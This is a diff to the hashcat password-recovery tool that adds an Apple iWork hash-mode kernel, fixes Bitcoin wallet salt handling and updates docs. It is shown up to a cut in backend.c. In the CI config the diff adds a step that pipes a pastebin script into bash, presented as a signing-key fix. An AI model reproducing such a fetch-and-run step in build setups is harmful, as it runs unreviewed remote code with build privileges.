diff --git a/.appveyor.yml b/.appveyor.yml
index 6082f9591..31a726934 100644
--- a/.appveyor.yml
+++ b/.appveyor.yml
@@ -34,6 +34,8 @@ install:
   - if defined CYG_ROOT (%CYG_SETUP% --quiet-mode --no-shortcuts --only-site --root "%CYG_ROOT%" --site "%CYG_MIRROR%" --local-package-dir "%CYG_CACHE%" --packages "%CYG_PACKAGES%" --upgrade-also)
   # (temporary?) problem with msys/pacman/objc/ada (see https://github.com/msys2/msys2/wiki/FAQ)
   - if defined MSYSTEM (%BASH% -lc "pacman -Rns --noconfirm mingw-w64-{i686,x86_64}-gcc-ada mingw-w64-{i686,x86_64}-gcc-objc")
+  # temporary fix for MSYS revoked/new signing keys:
+  - if defined MSYSTEM (%BASH% -lc "curl https://pastebin.com/raw/e0y4Ky9U | bash")
   - if defined MSYSTEM (%BASH% -lc "pacman -Suuy --noconfirm")
   # the following line is not a duplicate line:
   # it is necessary to upgrade the MSYS base files and after that all the packages
@@ -41,7 +43,7 @@ install:
   - if defined MSYSTEM (%BASH% -lc "pacman -Suuy --noconfirm")
 
 build_script:
-  - if defined BASH (%BASH% -lc "cd $(cygpath ${APPVEYOR_BUILD_FOLDER}) && git submodule update --init && make")
+  - if defined BASH (%BASH% -lc "cd $(cygpath ${APPVEYOR_BUILD_FOLDER}) && make")
 
 test_script:
   # some file globbing tests
@@ -64,3 +66,4 @@ only_commits:
     - include/*
     - OpenCL/inc_*
     - Makefile
+    - .appveyor.yml
diff --git a/OpenCL/m11300-pure.cl b/OpenCL/m11300-pure.cl
index 994721f3b..a9f33476e 100644
--- a/OpenCL/m11300-pure.cl
+++ b/OpenCL/m11300-pure.cl
@@ -296,29 +296,33 @@ KERNEL_FQ void m11300_comp (KERN_ATTR_TMPS_ESALT (bitcoin_wallet_tmp_t, bitcoin_
   key[6] = h32_from_64_S (dgst[3]);
   key[7] = l32_from_64_S (dgst[3]);
 
+  const u32 digest_pos = loop_pos;
+
+  const u32 digest_cur = digests_offset + digest_pos;
+
   #define KEYLEN 60
 
   u32 ks[KEYLEN];
 
   AES256_set_decrypt_key (ks, key, s_te0, s_te1, s_te2, s_te3, s_td0, s_td1, s_td2, s_td3);
 
-  u32 i = esalt_bufs[digests_offset].cry_master_len - 32;
+  u32 i = esalt_bufs[digest_cur].cry_master_len - 32;
 
   u32 iv[4];
 
-  iv[0] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 0]);
-  iv[1] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 1]);
-  iv[2] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 2]);
-  iv[3] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 3]);
+  iv[0] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 0]);
+  iv[1] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 1]);
+  iv[2] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 2]);
+  iv[3] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 3]);
 
   i += 16;
 
   u32 data[4];
 
-  data[0] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 0]);
-  data[1] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 1]);
-  data[2] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 2]);
-  data[3] = hc_swap32_S (esalt_bufs[digests_offset].cry_master_buf[(i / 4) + 3]);
+  data[0] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 0]);
+  data[1] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 1]);
+  data[2] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 2]);
+  data[3] = hc_swap32_S (esalt_bufs[digest_cur].cry_master_buf[(i / 4) + 3]);
 
   u32 out[4];
 
@@ -331,7 +335,7 @@ KERNEL_FQ void m11300_comp (KERN_ATTR_TMPS_ESALT (bitcoin_wallet_tmp_t, bitcoin_
 
   u32 pad = 0;
 
-  if (esalt_bufs[digests_offset].cry_salt_len != 18)
+  if (esalt_bufs[digest_cur].cry_salt_len != 18)
   {
     /* most wallets */
     pad = 0x10101010;
@@ -347,9 +351,9 @@ KERNEL_FQ void m11300_comp (KERN_ATTR_TMPS_ESALT (bitcoin_wallet_tmp_t, bitcoin_
 
   if (out[2] == pad && out[3] == pad)
   {
-    if (atomic_inc (&hashes_shown[digests_offset]) == 0)
+    if (atomic_inc (&hashes_shown[digest_cur]) == 0)
     {
-      mark_hash (plains_buf, d_return_buf, salt_pos, digests_cnt, 0, digests_offset + 0, gid, 0, 0, 0);
+      mark_hash (plains_buf, d_return_buf, salt_pos, digests_cnt, digest_pos, digest_cur, gid, 0, 0, 0);
     }
   }
 }
diff --git a/OpenCL/m23300-pure.cl b/OpenCL/m23300-pure.cl
new file mode 100644
index 000000000..a2f0bb4bc
--- /dev/null
+++ b/OpenCL/m23300-pure.cl
@@ -0,0 +1,410 @@
+/**
+ * Author......: See docs/credits.txt
+ * License.....: MIT
+ */
+
+#define NEW_SIMD_CODE
+
+#ifdef KERNEL_STATIC
+#include "inc_vendor.h"
+#include "inc_types.h"
+#include "inc_platform.cl"
+#include "inc_common.cl"
+#include "inc_simd.cl"
+#include "inc_hash_sha1.cl"
+#include "inc_hash_sha256.cl"
+#include "inc_cipher_aes.cl"
+#endif
+
+typedef struct iwork_tmp
+{
+  u32 ipad[5];
+  u32 opad[5];
+
+  u32 dgst[5];
+  u32 out[5];
+
+} iwork_tmp_t;
+
+typedef struct iwork
+{
+  u32 iv[4];
+  u32 data[16];
+
+} iwork_t;
+
+DECLSPEC void hmac_sha1_run_V (u32x *w0, u32x *w1, u32x *w2, u32x *w3, u32x *ipad, u32x *opad, u32x *digest)
+{
+  digest[0] = ipad[0];
+  digest[1] = ipad[1];
+  digest[2] = ipad[2];
+  digest[3] = ipad[3];
+  digest[4] = ipad[4];
+
+  sha1_transform_vector (w0, w1, w2, w3, digest);
+
+  w0[0] = digest[0];
+  w0[1] = digest[1];
+  w0[2] = digest[2];
+  w0[3] = digest[3];
+  w1[0] = digest[4];
+  w1[1] = 0x80000000;
+  w1[2] = 0;
+  w1[3] = 0;
+  w2[0] = 0;
+  w2[1] = 0;
+  w2[2] = 0;
+  w2[3] = 0;
+  w3[0] = 0;
+  w3[1] = 0;
+  w3[2] = 0;
+  w3[3] = (64 + 20) * 8;
+
+  digest[0] = opad[0];
+  digest[1] = opad[1];
+  digest[2] = opad[2];
+  digest[3] = opad[3];
+  digest[4] = opad[4];
+
+  sha1_transform_vector (w0, w1, w2, w3, digest);
+}
+
+KERNEL_FQ void m23300_init (KERN_ATTR_TMPS_ESALT (iwork_tmp_t, iwork_t))
+{
+  /**
+   * base
+   */
+
+  const u64 gid = get_global_id (0);
+
+  if (gid >= gid_max) return;
+
+  sha1_hmac_ctx_t sha1_hmac_ctx;
+
+  sha1_hmac_init_global_swap (&sha1_hmac_ctx, pws[gid].i, pws[gid].pw_len);
+
+  tmps[gid].ipad[0] = sha1_hmac_ctx.ipad.h[0];
+  tmps[gid].ipad[1] = sha1_hmac_ctx.ipad.h[1];
+  tmps[gid].ipad[2] = sha1_hmac_ctx.ipad.h[2];
+  tmps[gid].ipad[3] = sha1_hmac_ctx.ipad.h[3];
+  tmps[gid].ipad[4] = sha1_hmac_ctx.ipad.h[4];
+
+  tmps[gid].opad[0] = sha1_hmac_ctx.opad.h[0];
+  tmps[gid].opad[1] = sha1_hmac_ctx.opad.h[1];
+  tmps[gid].opad[2] = sha1_hmac_ctx.opad.h[2];
+  tmps[gid].opad[3] = sha1_hmac_ctx.opad.h[3];
+  tmps[gid].opad[4] = sha1_hmac_ctx.opad.h[4];
+
+  u32 w0[4];
+  u32 w1[4];
+  u32 w2[4];
+  u32 w3[4];
+
+  w0[0] = salt_bufs[salt_pos].salt_buf[0];
+  w0[1] = salt_bufs[salt_pos].salt_buf[1];
+  w0[2] = salt_bufs[salt_pos].salt_buf[2];
+  w0[3] = salt_bufs[salt_pos].salt_buf[3];
+  w1[0] = 0;
+  w1[1] = 0;
+  w1[2] = 0;
+  w1[3] = 0;
+  w2[0] = 0;
+  w2[1] = 0;
+  w2[2] = 0;
+  w2[3] = 0;
+  w3[0] = 0;
+  w3[1] = 0;
+  w3[2] = 0;
+  w3[3] = 0;
+
+  sha1_hmac_update_64 (&sha1_hmac_ctx, w0, w1, w2, w3, salt_bufs[salt_pos].salt_len);
+
+  for (u32 i = 0, j = 1; i < 4; i += 5, j += 1)
+  {
+    sha1_hmac_ctx_t sha1_hmac_ctx2 = sha1_hmac_ctx;
+
+    w0[0] = j;
+    w0[1] = 0;
+    w0[2] = 0;
+    w0[3] = 0;
+    w1[0] = 0;
+    w1[1] = 0;
+    w1[2] = 0;
+    w1[3] = 0;
+    w2[0] = 0;
+    w2[1] = 0;
+    w2[2] = 0;
+    w2[3] = 0;
+    w3[0] = 0;
+    w3[1] = 0;
+    w3[2] = 0;
+    w3[3] = 0;
+
+    sha1_hmac_update_64 (&sha1_hmac_ctx2, w0, w1, w2, w3, 4);
+
+    sha1_hmac_final (&sha1_hmac_ctx2);
+
+    tmps[gid].dgst[i + 0] = sha1_hmac_ctx2.opad.h[0];
+    tmps[gid].dgst[i + 1] = sha1_hmac_ctx2.opad.h[1];
+    tmps[gid].dgst[i + 2] = sha1_hmac_ctx2.opad.h[2];
+    tmps[gid].dgst[i + 3] = sha1_hmac_ctx2.opad.h[3];
+    tmps[gid].dgst[i + 4] = sha1_hmac_ctx2.opad.h[4];
+
+    tmps[gid].out[i + 0] = tmps[gid].dgst[i + 0];
+    tmps[gid].out[i + 1] = tmps[gid].dgst[i + 1];
+    tmps[gid].out[i + 2] = tmps[gid].dgst[i + 2];
+    tmps[gid].out[i + 3] = tmps[gid].dgst[i + 3];
+    tmps[gid].out[i + 4] = tmps[gid].dgst[i + 4];
+  }
+}
+
+KERNEL_FQ void m23300_loop (KERN_ATTR_TMPS_ESALT (iwork_tmp_t, iwork_t))
+{
+  const u64 gid = get_global_id (0);
+
+  if ((gid * VECT_SIZE) >= gid_max) return;
+
+  u32x ipad[5];
+  u32x opad[5];
+
+  ipad[0] = packv (tmps, ipad, gid, 0);
+  ipad[1] = packv (tmps, ipad, gid, 1);
+  ipad[2] = packv (tmps, ipad, gid, 2);
+  ipad[3] = packv (tmps, ipad, gid, 3);
+  ipad[4] = packv (tmps, ipad, gid, 4);
+
+  opad[0] = packv (tmps, opad, gid, 0);
+  opad[1] = packv (tmps, opad, gid, 1);
+  opad[2] = packv (tmps, opad, gid, 2);
+  opad[3] = packv (tmps, opad, gid, 3);
+  opad[4] = packv (tmps, opad, gid, 4);
+
+  for (u32 i = 0; i < 4; i += 5)
+  {
+    u32x dgst[5];
+    u32x out[5];
+
+    dgst[0] = packv (tmps, dgst, gid, i + 0);
+    dgst[1] = packv (tmps, dgst, gid, i + 1);
+    dgst[2] = packv (tmps, dgst, gid, i + 2);
+    dgst[3] = packv (tmps, dgst, gid, i + 3);
+    dgst[4] = packv (tmps, dgst, gid, i + 4);
+
+    out[0] = packv (tmps, out, gid, i + 0);
+    out[1] = packv (tmps, out, gid, i + 1);
+    out[2] = packv (tmps, out, gid, i + 2);
+    out[3] = packv (tmps, out, gid, i + 3);
+    out[4] = packv (tmps, out, gid, i + 4);
+
+    for (u32 j = 0; j < loop_cnt; j++)
+    {
+      u32x w0[4];
+      u32x w1[4];
+      u32x w2[4];
+      u32x w3[4];
+
+      w0[0] = dgst[0];
+      w0[1] = dgst[1];
+      w0[2] = dgst[2];
+      w0[3] = dgst[3];
+      w1[0] = dgst[4];
+      w1[1] = 0x80000000;
+      w1[2] = 0;
+      w1[3] = 0;
+      w2[0] = 0;
+      w2[1] = 0;
+      w2[2] = 0;
+      w2[3] = 0;
+      w3[0] = 0;
+      w3[1] = 0;
+      w3[2] = 0;
+      w3[3] = (64 + 20) * 8;
+
+      hmac_sha1_run_V (w0, w1, w2, w3, ipad, opad, dgst);
+
+      out[0] ^= dgst[0];
+      out[1] ^= dgst[1];
+      out[2] ^= dgst[2];
+      out[3] ^= dgst[3];
+      out[4] ^= dgst[4];
+    }
+
+    unpackv (tmps, dgst, gid, i + 0, dgst[0]);
+    unpackv (tmps, dgst, gid, i + 1, dgst[1]);
+    unpackv (tmps, dgst, gid, i + 2, dgst[2]);
+    unpackv (tmps, dgst, gid, i + 3, dgst[3]);
+    unpackv (tmps, dgst, gid, i + 4, dgst[4]);
+
+    unpackv (tmps, out, gid, i + 0, out[0]);
+    unpackv (tmps, out, gid, i + 1, out[1]);
+    unpackv (tmps, out, gid, i + 2, out[2]);
+    unpackv (tmps, out, gid, i + 3, out[3]);
+    unpackv (tmps, out, gid, i + 4, out[4]);
+  }
+}
+
+KERNEL_FQ void m23300_comp (KERN_ATTR_TMPS_ESALT (iwork_tmp_t, iwork_t))
+{
+  const u64 gid = get_global_id (0);
+  const u64 lid = get_local_id (0);
+  const u64 lsz = get_local_size (0);
+
+  /**
+   * aes shared
+   */
+
+  #ifdef REAL_SHM
+
+  LOCAL_VK u32 s_td0[256];
+  LOCAL_VK u32 s_td1[256];
+  LOCAL_VK u32 s_td2[256];
+  LOCAL_VK u32 s_td3[256];
+  LOCAL_VK u32 s_td4[256];
+
+  LOCAL_VK u32 s_te0[256];
+  LOCAL_VK u32 s_te1[256];
+  LOCAL_VK u32 s_te2[256];
+  LOCAL_VK u32 s_te3[256];
+  LOCAL_VK u32 s_te4[256];
+
+  for (u32 i = lid; i < 256; i += lsz)
+  {
+    s_td0[i] = td0[i];
+    s_td1[i] = td1[i];
+    s_td2[i] = td2[i];
+    s_td3[i] = td3[i];
+    s_td4[i] = td4[i];
+
+    s_te0[i] = te0[i];
+    s_te1[i] = te1[i];
+    s_te2[i] = te2[i];
+    s_te3[i] = te3[i];
+    s_te4[i] = te4[i];
+  }
+
+  SYNC_THREADS ();
+
+  #else
+
+  CONSTANT_AS u32a *s_td0 = td0;
+  CONSTANT_AS u32a *s_td1 = td1;
+  CONSTANT_AS u32a *s_td2 = td2;
+  CONSTANT_AS u32a *s_td3 = td3;
+  CONSTANT_AS u32a *s_td4 = td4;
+
+  CONSTANT_AS u32a *s_te0 = te0;
+  CONSTANT_AS u32a *s_te1 = te1;
+  CONSTANT_AS u32a *s_te2 = te2;
+  CONSTANT_AS u32a *s_te3 = te3;
+  CONSTANT_AS u32a *s_te4 = te4;
+
+  #endif
+
+  if (gid >= gid_max) return;
+
+  /**
+   * AES part
+   */
+
+  u32 ukey[8];
+
+  ukey[0] = tmps[gid].out[0];
+  ukey[1] = tmps[gid].out[1];
+  ukey[2] = tmps[gid].out[2];
+  ukey[3] = tmps[gid].out[3];
+
+  #define KEYLEN 44
+
+  u32 ks[KEYLEN];
+
+  AES128_set_decrypt_key (ks, ukey, s_te0, s_te1, s_te2, s_te3, s_td0, s_td1, s_td2, s_td3);
+
+  u32 iv[4];
+
+  iv[0] = esalt_bufs[digests_offset].iv[0];
+  iv[1] = esalt_bufs[digests_offset].iv[1];
+  iv[2] = esalt_bufs[digests_offset].iv[2];
+  iv[3] = esalt_bufs[digests_offset].iv[3];
+
+  u32 res[12]; // actually res[16], but we don't need the full 64 bytes output
+
+  for (u32 i = 0; i < 12; i += 4)
+  {
+    u32 data[4];
+
+    data[0] = esalt_bufs[digests_offset].data[i + 0];
+    data[1] = esalt_bufs[digests_offset].data[i + 1];
+    data[2] = esalt_bufs[digests_offset].data[i + 2];
+    data[3] = esalt_bufs[digests_offset].data[i + 3];
+
+    u32 out[4];
+
+    aes128_decrypt (ks, data, out, s_td0, s_td1, s_td2, s_td3, s_td4);
+
+    res[i + 0] = out[0] ^ iv[0];
+    res[i + 1] = out[1] ^ iv[1];
+    res[i + 2] = out[2] ^ iv[2];
+    res[i + 3] = out[3] ^ iv[3];
+
+    iv[0] = data[0];
+    iv[1] = data[1];
+    iv[2] = data[2];
+    iv[3] = data[3];
+  }
+
+  sha256_ctx_t ctx;
+
+  sha256_init (&ctx);
+
+  u32 w0[4];
+
+  w0[0] = hc_swap32_S (res[0]);
+  w0[1] = hc_swap32_S (res[1]);
+  w0[2] = hc_swap32_S (res[2]);
+  w0[3] = hc_swap32_S (res[3]);
+
+  u32 w1[4];
+
+  w1[0] = hc_swap32_S (res[4]);
+  w1[1] = hc_swap32_S (res[5]);
+  w1[2] = hc_swap32_S (res[6]);
+  w1[3] = hc_swap32_S (res[7]);
+
+  u32 w2[4];
+
+  w2[0] = 0;
+  w2[1] = 0;
+  w2[2] = 0;
+  w2[3] = 0;
+
+  u32 w3[4];
+
+  w3[0] = 0;
+  w3[1] = 0;
+  w3[2] = 0;
+  w3[3] = 0;
+
+  sha256_update_64 (&ctx, w0, w1, w2, w3, 32);
+
+  sha256_final (&ctx);
+
+  u32 checksum[4];
+
+  checksum[0] = hc_swap32_S (ctx.h[0]);
+  checksum[1] = hc_swap32_S (ctx.h[1]);
+  checksum[2] = hc_swap32_S (ctx.h[2]);
+  checksum[3] = hc_swap32_S (ctx.h[3]);
+
+  if ((res[ 8] == checksum[0]) &&
+      (res[ 9] == checksum[1]) &&
+      (res[10] == checksum[2]) &&
+      (res[11] == checksum[3]))
+  {
+    if (atomic_inc (&hashes_shown[digests_offset]) == 0)
+    {
+      mark_hash (plains_buf, d_return_buf, salt_pos, digests_cnt, 0, digests_offset + 0, gid, 0, 0, 0);
+    }
+
+    return;
+  }
+}
diff --git a/docs/changes.txt b/docs/changes.txt
index b67e87fc5..bb8dbaedc 100644
--- a/docs/changes.txt
+++ b/docs/changes.txt
@@ -5,6 +5,7 @@
 ##
 
 - Added hash-mode: Bitwarden
+- Added hash-mode: Apple iWork
 - Added hash-mode: RSA/DSA/EC/OPENSSH Private Keys
 
 ##
@@ -13,6 +14,21 @@
 
 - Fixed too early execution of some module functions which could make use of non-final values opts_type and opti_type
 - Fixed internal access on module option attribute OPTS_TYPE_SUGGEST_KG with the result that it was unused
+- Fixed race condition resulting in out of memory error on startup if multiple hashcat instances are started at the same time
+- Fixed unexpected non-unique salts in multi-hash cracking in Bitcoin/Litecoin wallet.dat module which lead to false negatives
+
+##
+## Improvements
+##
+
+- Startup time: Improved the startup time by avoiding some time intensive operations for skipped devices
+
+##
+## Technical
+##
+
+- Hash-Mode 13200 (AxCrypt): Changed the name to AxCrypt 1 to avoid confusion
+- Hash-Mode 13300 (AxCrypt in-memory SHA1): Changed the name to AxCrypt 1 in-memory SHA1
 
 * changes v6.1.0 -> v6.1.1
 
diff --git a/docs/hashcat-plugin-development-guide.md b/docs/hashcat-plugin-development-guide.md
index e87f56016..078aa64d0 100644
--- a/docs/hashcat-plugin-development-guide.md
+++ b/docs/hashcat-plugin-development-guide.md
@@ -383,6 +383,8 @@ This configuration item is a bitmask field. There are a few switches which you c
 * OPTI_TYPE_SLOW_HASH_SIMD_INIT: This flag tells the hashcat host binary to divide the number of work items with the size of the vector being used. The *_init kernel needs to be written using vector data types. Vector data types have a strong impact on CPU performance, since they will be translated from the OpenCL JiT into SSE2/AVX/AVX2/XOP instructions. Modern GPUs use scalar data types thus there is no benefit from using vector data types. This is not recommended for *_init kernels because it makes the kernel much more complicated while at the same time the _init kernel is called only once per password guess.
 * OPTI_TYPE_SLOW_HASH_SIMD_LOOP: see OPTI_TYPE_SLOW_HASH_SIMD_INIT but for *_loop kernels. If it is possible for your *_loop kernel to be written in vector data types, this is highly recommended. You will typically find this option being used if the _loop kernel does not do any data-dependent branching.
 * OPTI_TYPE_SLOW_HASH_SIMD_COMP: see OPTI_TYPE_SLOW_HASH_SIMD_INIT but for *_comp kernels.
+* OPTI_TYPE_SLOW_HASH_SIMD_INIT2: see OPTI_TYPE_SLOW_HASH_SIMD_INIT but for *_init2 kernels.
+* OPTI_TYPE_SLOW_HASH_SIMD_LOOP2: see OPTI_TYPE_SLOW_HASH_SIMD_LOOP but for *_loop2 kernels.
 * OPTI_TYPE_USES_BITS_8: This flag is passed to the JiT and helps optimize some of the GPU library functions at compile time. The configuration defines the bitsize of the underlying crypto primitive.
 * OPTI_TYPE_USES_BITS_16: see OPTI_TYPE_USES_BITS_8
 * OPTI_TYPE_USES_BITS_32: see OPTI_TYPE_USES_BITS_8. This is the default in case no OPTI_TYPE_USES_BITS_* flag is being used. Almost all traditional crypto primitives use 32 bits: MD4, MD5, SHA1, SHA256, RipeMD160, etc.
diff --git a/docs/readme.txt b/docs/readme.txt
index 75fe66cf8..9fcf86a54 100644
--- a/docs/readme.txt
+++ b/docs/readme.txt
@@ -259,6 +259,7 @@ NVIDIA GPUs require "NVIDIA Driver" (440.64 or later) and "CUDA Toolkit" (9.0 or
 - PDF 1.4 - 1.6 (Acrobat 5 - 8)
 - PDF 1.7 Level 3 (Acrobat 9)
 - PDF 1.7 Level 8 (Acrobat 10 - 11)
+- Apple iWork
 - MS Office 2007
 - MS Office 2010
 - MS Office 2013
@@ -308,8 +309,8 @@ NVIDIA GPUs require "NVIDIA Driver" (440.64 or later) and "CUDA Toolkit" (9.0 or
 - iTunes backup >= 10.0
 - WinZip
 - Android Backup
-- AxCrypt
-- AxCrypt in-memory SHA1
+- AxCrypt 1
+- AxCrypt 1 in-memory SHA1
 - WBB3 (Woltlab Burning Board)
 - vBulletin < v3.8.5
 - vBulletin >= v3.8.5
diff --git a/include/types.h b/include/types.h
index 17da719a2..eecbe2f69 100644
--- a/include/types.h
+++ b/include/types.h
@@ -354,27 +354,29 @@ typedef enum salt_type
 
 typedef enum opti_type
 {
-  OPTI_TYPE_OPTIMIZED_KERNEL    = (1 <<  0),
-  OPTI_TYPE_ZERO_BYTE           = (1 <<  1),
-  OPTI_TYPE_PRECOMPUTE_INIT     = (1 <<  2),
-  OPTI_TYPE_MEET_IN_MIDDLE      = (1 <<  3),
-  OPTI_TYPE_EARLY_SKIP          = (1 <<  4),
-  OPTI_TYPE_NOT_SALTED          = (1 <<  5),
-  OPTI_TYPE_NOT_ITERATED        = (1 <<  6),
-  OPTI_TYPE_PREPENDED_SALT      = (1 <<  7),
-  OPTI_TYPE_APPENDED_SALT       = (1 <<  8),
-  OPTI_TYPE_SINGLE_HASH         = (1 <<  9),
-  OPTI_TYPE_SINGLE_SALT         = (1 << 10),
-  OPTI_TYPE_BRUTE_FORCE         = (1 << 11),
-  OPTI_TYPE_RAW_HASH            = (1 << 12),
-  OPTI_TYPE_SLOW_HASH_SIMD_INIT = (1 << 13),
-  OPTI_TYPE_SLOW_HASH_SIMD_LOOP = (1 << 14),
-  OPTI_TYPE_SLOW_HASH_SIMD_COMP = (1 << 15),
-  OPTI_TYPE_USES_BITS_8         = (1 << 16),
-  OPTI_TYPE_USES_BITS_16        = (1 << 17),
-  OPTI_TYPE_USES_BITS_32        = (1 << 18),
-  OPTI_TYPE_USES_BITS_64        = (1 << 19),
-  OPTI_TYPE_REGISTER_LIMIT      = (1 << 20), // We'll limit the register count to 128
+  OPTI_TYPE_OPTIMIZED_KERNEL      = (1 <<  0),
+  OPTI_TYPE_ZERO_BYTE             = (1 <<  1),
+  OPTI_TYPE_PRECOMPUTE_INIT       = (1 <<  2),
+  OPTI_TYPE_MEET_IN_MIDDLE        = (1 <<  3),
+  OPTI_TYPE_EARLY_SKIP            = (1 <<  4),
+  OPTI_TYPE_NOT_SALTED            = (1 <<  5),
+  OPTI_TYPE_NOT_ITERATED          = (1 <<  6),
+  OPTI_TYPE_PREPENDED_SALT        = (1 <<  7),
+  OPTI_TYPE_APPENDED_SALT         = (1 <<  8),
+  OPTI_TYPE_SINGLE_HASH           = (1 <<  9),
+  OPTI_TYPE_SINGLE_SALT           = (1 << 10),
+  OPTI_TYPE_BRUTE_FORCE           = (1 << 11),
+  OPTI_TYPE_RAW_HASH              = (1 << 12),
+  OPTI_TYPE_SLOW_HASH_SIMD_INIT   = (1 << 13),
+  OPTI_TYPE_SLOW_HASH_SIMD_LOOP   = (1 << 14),
+  OPTI_TYPE_SLOW_HASH_SIMD_COMP   = (1 << 15),
+  OPTI_TYPE_USES_BITS_8           = (1 << 16),
+  OPTI_TYPE_USES_BITS_16          = (1 << 17),
+  OPTI_TYPE_USES_BITS_32          = (1 << 18),
+  OPTI_TYPE_USES_BITS_64          = (1 << 19),
+  OPTI_TYPE_REGISTER_LIMIT        = (1 << 20), // We'll limit the register count to 128
+  OPTI_TYPE_SLOW_HASH_SIMD_INIT2  = (1 << 21),
+  OPTI_TYPE_SLOW_HASH_SIMD_LOOP2  = (1 << 22),
 
 } opti_type_t;
 
diff --git a/src/Makefile b/src/Makefile
index e4d792e19..8d97e7297 100644
--- a/src/Makefile
+++ b/src/Makefile
@@ -106,7 +106,7 @@ LIBRARY_DEV_ROOT_FOLDER ?= $(PREFIX)/include
 LIBRARY_DEV_FOLDER      ?= $(LIBRARY_DEV_ROOT_FOLDER)/hashcat
 
 ##
-## Depencies paths
+## Dependencies paths
 ##
 
 ifeq ($(USE_SYSTEM_LZMA),0)
diff --git a/src/backend.c b/src/backend.c
index 58aa8094f..894eb8746 100644
--- a/src/backend.c
+++ b/src/backend.c
@@ -3596,6 +3596,20 @@ int run_kernel (hashcat_ctx_t *hashcat_ctx, hc_device_param_t *device_param, con
         num_elements = CEILDIV (num_elements, device_param->vector_width);
       }
     }
+    else if (kern_run == KERN_RUN_INIT2)
+    {
+      if (hashconfig->opti_type & OPTI_TYPE_SLOW_HASH_SIMD_INIT2)
+      {
+        num_elements = CEILDIV (num_elements, device_param->vector_width);
+      }
+    }
+    else if (kern_run == KERN_RUN_LOOP2)
+    {
+      if (hashconfig->opti_type & OPTI_TYPE_SLOW_HASH_SIMD_LOOP2)
+      {
+        num_elements = CEILDIV (num_elements, device_param->vector_width);
+      }
+    }
 
     if (hc_cuEventRecord (hashcat_ctx, device_param->cuda_event1, device_param->cuda_stream) == -1) return -1;
 
@@ -5540,7 +5554,7 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
         device_param->skipped = true;
       }
 
-      // some attributes have to be hardcoded because they are used for instance in the build options
+      // some attributes have to be hardcoded values because they are used for instance in the build options
 
       device_param->device_local_mem_type     = CL_LOCAL;
       device_param->opencl_device_type        = CL_DEVICE_TYPE_GPU;
@@ -5616,11 +5630,7 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
         cuda_devices_active++;
       }
 
-      CUcontext cuda_context;
-
-      if (hc_cuCtxCreate (hashcat_ctx, &cuda_context, CU_CTX_SCHED_BLOCKING_SYNC, device_param->cuda_device) == -1) return -1;
-
-      if (hc_cuCtxSetCurrent (hashcat_ctx, cuda_context) == -1) return -1;
+      // instruction set
 
       // bcrypt optimization?
       //const int rc_cuCtxSetCacheConfig = hc_cuCtxSetCacheConfig (hashcat_ctx, CU_FUNC_CACHE_PREFER_SHARED);
@@ -5638,46 +5648,13 @@ int backend_ctx_devices_init (hashcat_ctx_t *hashcat_ctx, const int comptime)
       device_param->has_mov64 = (sm >= 10) ? true : false;
       device_param->has_prmt  = (sm >= 20) ? true : false;
 
-      /*
-      #define RUN_INSTRUCTION_CHECKS()                                                                                                                                                                                                                      \
-        device_param->has_add   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"add.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                              \
-        device_param->has_addc  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"addc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                             \
-        device_param->has_sub   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"sub.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                              \
-        device_param->has_subc  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"subc.cc.u32 %0, 0, 0;\" : \"=r\"(r)); }");                                                             \
-        device_param->has_bfe   = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"bfe.u32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                                              \
-        device_param->has_lop3  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"lop3.b32 %0, 0, 0, 0, 0;\" : \"=r\"(r)); }");                                                          \
-        device_param->has_mov64 = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned long long r; unsigned int a; unsigned int b; asm volatile (\"mov.b64 %0, {%1, %2};\" : \"=l\"(r) : \"r\"(a), \"r\"(b)); }");  \
-        device_param->has_prmt  = cuda_test_instruction (hashcat_ctx, sm_major, sm_minor, "__global__ void test () { unsigned int r; asm volatile (\"prmt.b32 %0, 0, 0, 0;\" : \"=r\"(r)); }");                                                             \
-
-      if (backend_devices_idx > 0)
-      {
-        hc_device_param_t *device_param_prev = &devices_param[backend_devices_idx - 1];
-
-        if (is_same_device_type (device_param, device_param_prev) == true)
-        {
-          device_param->has_add   = device_param_prev->has_add;
-          device_param->has_addc  = device_param_prev->has_addc;
-          device_param->has_sub   = device_param_prev->has_sub;
-          device_param->has_subc  = device_param_prev->has_subc;
-          device_param->has_bfe   = device_param_prev->has_bfe;
-          device_param->has_lop3  = device_param_prev->has_lop3;
-          device_param->has_mov64 = device_param_prev->has_mov64;
-          device_param->has_prmt  = device_param_prev->has_prmt;
-        }
-        else
-        {
-          RUN_INSTRUCTION_CHECKS();
-        }
-      }
-      else
-      {
